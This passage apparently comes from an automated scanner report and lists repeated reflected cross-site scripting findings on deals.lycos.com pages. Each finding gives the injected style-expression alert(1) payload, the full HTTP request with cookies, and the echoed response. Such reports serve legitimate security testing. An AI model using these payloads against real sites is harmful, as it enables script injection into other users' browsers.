This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated here uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /deals/category/health-and-beauty-228?b70e3"style%3d"x%3aexpression(alert(1))"c8c79da67d5=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:12 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:13 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 46967
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="?pn=2&b70e3"style="x:expression(alert(1))"c8c79da67d5=1"> ...[SNIP]...
3.36. http://deals.lycos.com/deals/category/home-and-garden-196 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://deals.lycos.com
Path: /deals/category/home-and-garden-196
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15b6e"style%3d"x%3aexpression(alert(1))"da228453765 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 15b6e"style="x:expression(alert(1))"da228453765 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated here uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /deals/category/home-and-garden-196?15b6e"style%3d"x%3aexpression(alert(1))"da228453765=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:30 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:30 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47915
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="?pn=2&15b6e"style="x:expression(alert(1))"da228453765=1"> ...[SNIP]...
3.37. http://deals.lycos.com/deals/category/lcd-tvs-424 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://deals.lycos.com
Path: /deals/category/lcd-tvs-424
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c44fe"style%3d"x%3aexpression(alert(1))"9561e55b253 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c44fe"style="x:expression(alert(1))"9561e55b253 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated here uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /deals/category/lcd-tvs-424?c44fe"style%3d"x%3aexpression(alert(1))"9561e55b253=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:30 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:30 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 48888
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="?pn=2&c44fe"style="x:expression(alert(1))"9561e55b253=1"> ...[SNIP]...
3.38. http://deals.lycos.com/deals/category/movies-music-books-178 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://deals.lycos.com
Path: /deals/category/movies-music-books-178
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0cfa"style%3d"x%3aexpression(alert(1))"f4ca06b8abd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b0cfa"style="x:expression(alert(1))"f4ca06b8abd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated here uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /deals/category/movies-music-books-178?b0cfa"style%3d"x%3aexpression(alert(1))"f4ca06b8abd=1 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:31:13 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:14 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 46295
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="?pn=2&b0cfa"style="x:expression(alert(1))"f4ca06b8abd=1"> ...[SNIP]...
3.39. http://deals.lycos.com/deals/category/mp3-players-144 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://deals.lycos.com
Path: /deals/category/mp3-players-144
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7d05"style%3d"x%3aexpression(alert(1))"683cdf99577 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e7d05"style="x:expression(alert(1))"683cdf99577 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated here uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /deals/category/mp3-players-144?e7d05"style%3d"x%3aexpression(alert(1))"683cdf99577=1 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:30:28 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:29 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 48378
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="?pn=2&e7d05"style="x:expression(alert(1))"683cdf99577=1"> ...[SNIP]...
3.40. http://deals.lycos.com/deals/category/office-and-supplies-182 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://deals.lycos.com
Path: /deals/category/office-and-supplies-182
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80659"style%3d"x%3aexpression(alert(1))"5affdd2a85 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 80659"style="x:expression(alert(1))"5affdd2a85 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated here uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /deals/category/office-and-supplies-182?80659"style%3d"x%3aexpression(alert(1))"5affdd2a85=1 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:31:14 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:15 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 47403
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="?pn=2&80659"style="x:expression(alert(1))"5affdd2a85=1"> ...[SNIP]...
3.41. http://deals.lycos.com/deals/category/pc-computers-47 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://deals.lycos.com
Path: /deals/category/pc-computers-47
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99553"style%3d"x%3aexpression(alert(1))"74c4b97e54d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 99553"style="x:expression(alert(1))"74c4b97e54d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated here uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /deals/category/pc-computers-47?99553"style%3d"x%3aexpression(alert(1))"74c4b97e54d=1 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:30:27 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:27 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 47650
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="?pn=2&99553"style="x:expression(alert(1))"74c4b97e54d=1"> ...[SNIP]...
3.42. http://deals.lycos.com/deals/category/sports-and-fitness-211 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://deals.lycos.com
Path: /deals/category/sports-and-fitness-211
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1636"style%3d"x%3aexpression(alert(1))"804d8716915 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b1636"style="x:expression(alert(1))"804d8716915 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated here uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /deals/category/sports-and-fitness-211?b1636"style%3d"x%3aexpression(alert(1))"804d8716915=1 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:31:14 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:14 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 46586
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="?pn=2&b1636"style="x:expression(alert(1))"804d8716915=1"> ...[SNIP]...
3.43. http://deals.lycos.com/deals/category/televisions-159 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://deals.lycos.com
Path: /deals/category/televisions-159
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25137"style%3d"x%3aexpression(alert(1))"bca27b4183 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 25137"style="x:expression(alert(1))"bca27b4183 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated here uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /deals/category/televisions-159?25137"style%3d"x%3aexpression(alert(1))"bca27b4183=1 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:31:24 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:24 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 48037
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="?pn=2&25137"style="x:expression(alert(1))"bca27b4183=1"> ...[SNIP]...
3.44. http://deals.lycos.com/deals/category/travel-and-entertainment-206 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://deals.lycos.com
Path: /deals/category/travel-and-entertainment-206
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23e36"style%3d"x%3aexpression(alert(1))"b5dbc63acb4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 23e36"style="x:expression(alert(1))"b5dbc63acb4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated here uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /deals/category/travel-and-entertainment-206?23e36"style%3d"x%3aexpression(alert(1))"b5dbc63acb4=1 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:31:16 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:17 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 47009
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="?pn=2&23e36"style="x:expression(alert(1))"b5dbc63acb4=1"> ...[SNIP]...
3.45. http://deals.lycos.com/deals/stores/best-buy-560 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://deals.lycos.com
Path: /deals/stores/best-buy-560
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9585"style%3d"x%3aexpression(alert(1))"08d8944c63d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d9585"style="x:expression(alert(1))"08d8944c63d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated here uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /deals/stores/best-buy-560?d9585"style%3d"x%3aexpression(alert(1))"08d8944c63d=1 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:32:10 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:10 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 47041
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="?pn=2&d9585"style="x:expression(alert(1))"08d8944c63d=1"> ...[SNIP]...
3.46. http://deals.lycos.com/deals/stores/buy-com-233 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://deals.lycos.com
Path: /deals/stores/buy-com-233
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e75fd"style%3d"x%3aexpression(alert(1))"3e066d15b13 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e75fd"style="x:expression(alert(1))"3e066d15b13 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated here uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /deals/stores/buy-com-233?e75fd"style%3d"x%3aexpression(alert(1))"3e066d15b13=1 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:31:28 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:28 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 46949
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="?pn=2&e75fd"style="x:expression(alert(1))"3e066d15b13=1"> ...[SNIP]...
3.47. http://deals.lycos.com/deals/stores/dell-home-638 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://deals.lycos.com
Path: /deals/stores/dell-home-638
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61e95"style%3d"x%3aexpression(alert(1))"a787e8b7cfe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 61e95"style="x:expression(alert(1))"a787e8b7cfe in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated here uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /deals/stores/dell-home-638?61e95"style%3d"x%3aexpression(alert(1))"a787e8b7cfe=1 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
